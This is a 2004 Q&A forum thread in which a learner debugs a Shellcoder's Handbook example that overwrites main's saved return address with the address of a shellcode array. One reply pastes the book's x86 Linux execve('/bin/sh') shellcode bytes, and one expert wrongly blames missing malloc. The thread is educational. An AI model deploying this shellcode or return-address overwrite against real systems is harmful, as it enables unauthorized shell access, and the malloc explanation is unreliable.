Solved

q about char code[] cast as (int)code conversion

Posted on 2004-09-15
15
464 Views
Last Modified: 2010-04-15
HI c area gys and gals.,
following is code from the shellcoder's handbook page 23.  It segfaults, and when debugging i run across an incomprehensible value for (int)shellcode.

char shellcode[] = "0001";
int main() {
  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

AS shown in the debugging cut/paste here:

(gdb) p shellcode
$1 = "0001"
(gdb) p &shellcode
$2 = (char (*)[5]) 0x8049534
(gdb) p (char *)shellcode
$3 = 0x8049534 "0001"
(gdb) p (int)shellcode
$4 = 134518068

$4 is different from the hex value 0x8049534 and sizeof char on RHFC2 is 4, so i thought it would print "1" because char shellcode[] = "0001".  Why doesn't it?
0
Comment
Question by:joesp
15 Comments
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12065777
134518068 is exact 0x8049534
(int)shellcode will print the address of shellcode
it not mean parse a string shellcode to int value
so it would not be 1

if you told use about what about this code want to told you in example,it may help us to explain it
0
 
LVL 1

Author Comment

by:joesp
ID: 12066110
uh, yes, i was wrong about the conversion -- i finally found a hextodec in converter.java and it is an int conversion of the address 0x8.....
what does it do?
they are adding 2 to the address of the first variable on the stack to overwrite its RET value (I think the stack is

RET
EBP
shellcode

so &shellcode+2 == &RET
(gdb) p &ret
$1 = (int **) 0xfeefdb64
(gdb) info registers
eax            0x0      0
ecx            0xfeefdbfc       -17835012
edx            0xfeefdbf4       -17835020
ebx            0x552ffc 5582844
esp            0xfeefdb60       0xfeefdb60
ebp            0xfeefdb68       0xfeefdb68
esi            0x1      1
edi            0x5550fc 5591292
eip            0x804834c        0x804834c

so &ret is between ebp and esp

in gdb, &ret+1 == ebp
If i use &ret+1 instead of &ret+2 it doesn't segfault.  Does anybody know the purpose, though, of casting to "int"?
0
 
LVL 4

Expert Comment

by:smpoojary
ID: 12066149
char shellcode[] = "0001";
int main() {
  int *ret;
// Here memory allocation statement for ret is missed.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

In the above code you didn't initialize memory for ret. For initializing memory, use malloc() or calloc(). That's why segmentation fault is coming. Means you can't use &ret + 2. First you have to initialize for ret [ret = (int*)malloc(5*sizeof(int));] then you can write ret = ret + 2; (*ret)=(int)shellcode;

-Mahesh
0
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12066177
I think you may make clear about the bytes of ebp .... in your computer and system
0
 
LVL 16

Expert Comment

by:PaulCaswell
ID: 12066316
Its a stack hack!

>>ret = (int *)&ret + 2;

is taking the address of the only variable on the stack and adding 2 to it. It is therefore assuming that the return opcode is next on the stack, it is 2 bytes in length and there is an important address following it. Its then trying to hack that address to contain some stupid value of the address of a string in data space.

It WILL go bang on almost every system other than the one it was crafted for.

Paul
0
 
LVL 1

Author Comment

by:joesp
ID: 12066367
but my post@ 8:43 shows
------------------
(gdb) p &ret
$1 = (int **) 0xfeefdb64
------------------
it has an address on the stack.  Maybe what you mean is -- it's not initialized, so the place it points hasn't been initialized yet, or no space has been allocated on the heap .. but this is all just stack address manipulation.

ebp in x86 points to the beginning of the   stack, like esp points to the current location of the stack pointer
0
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12066411
ret real not point to an alloc memory part
the program surely want to attach some part in stack that normally can not access by the variant in the function
I think it may be the return value of main
but it is straight for
(*ret) = (int)shellcode;
so may be you should read carefully about what this example the book want to told you
if you still unknow the means please post the book reference part of the example and let's discuss about it
0
Top 6 Sources for Identifying Threat Actor TTPs

Understanding your enemy is essential. These six sources will help you identify the most popular threat actor tactics, techniques, and procedures (TTPs).

 
LVL 1

Author Comment

by:joesp
ID: 12066417
i may have to figure out on my own why it's not working.  The book example he gives segfaults, unless i only add 1 to &ret ... which doesn't run the shellcode, so i will have to research this one.  This problem runs deeper than i thought ... originally, i just wanted to know why it cast to an int.  I'm still open for that answer, BTW
0
 
LVL 1

Author Comment

by:joesp
ID: 12066472
source

http://www.sirfsup.com/languages/assembler/koziol/Chapter_02/Shellcoders02sampleprogram05.c

it should do this>:

$gcc shellcode.c -o shellcode
$./shellcode
#

as he explains, the shellcode is the objdump of exe code to create shell
0
 
LVL 5

Accepted Solution

by:
tzxie2000 earned 150 total points
ID: 12066490
Oh, I see

I think it may want to assign the return position in the stack

like a little different code

char shellcode[] = "0001";
int main() {
  int i;
  f();
  i=1;
}
int f() {
  int *ret;
// Here memory allocation statement for ret is missed.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

normally the return address will be the code site at i=1; but after

  int *ret;
// Here memory allocation statement for ret is missed.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;

the book want to assign the return address to a data segment and when the function f //so to main return it will access a data segment and lead to seg fault
0
 
LVL 1

Author Comment

by:joesp
ID: 12066726
does this book example work for anybody else?  You can download that source from that same page by clicking "any_browser_source.txt" or if you are using MSIE you need click "msie.txt"
0
 
LVL 1

Author Comment

by:joesp
ID: 12066889
txzie2000

you are on the right track ... it is overwriting the return address of RET by replacing that value (which points to an address) with the address not of (wherever the hell "main" returns to after it exits) but with the address of shellcode which (magically) (magic helped by the fact that it's an object dump?) executes (itself?) then after main returns ... i am not conviced it is segfaulting because it is trying to access code from the data section .... once the program exits .... the code in the data section is returned to the system, and just be any old addressable address, no?
0
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12066932
yes I test the code

I think may be the shellcode assigne by the book
char shellcode[] =    
 "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
 "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
 "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

is more special and contain some code in the system

I test the code and my system crashed
   
0
 
LVL 1

Author Comment

by:joesp
ID: 12067108
tzxie2000 thank you for your time.  I am sorry we couldn't resolve this.  it is only the second chapter, i will post here when i find the answer later in the book .... i don't have the time at the moment.
0
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12067174
you're welcome
0

Featured Post

Why You Should Analyze Threat Actor TTPs

After years of analyzing threat actor behavior, it’s become clear that at any given time there are specific tactics, techniques, and procedures (TTPs) that are particularly prevalent. By analyzing and understanding these TTPs, you can dramatically enhance your security program.

Join & Write a Comment

Have you thought about creating an iPhone application (app), but didn't even know where to get started? Here's how: ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ Important pre-programming comments: I’ve never tri…
Summary: This tutorial covers some basics of pointer, pointer arithmetic and function pointer. What is a pointer: A pointer is a variable which holds an address. This address might be address of another variable/address of devices/address of fu…
The goal of this video is to provide viewers with basic examples to understand recursion in the C programming language.
The goal of this video is to provide viewers with basic examples to understand how to create, access, and change arrays in the C programming language.

743 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

14 Experts available now in Live!

Get 1:1 Help Now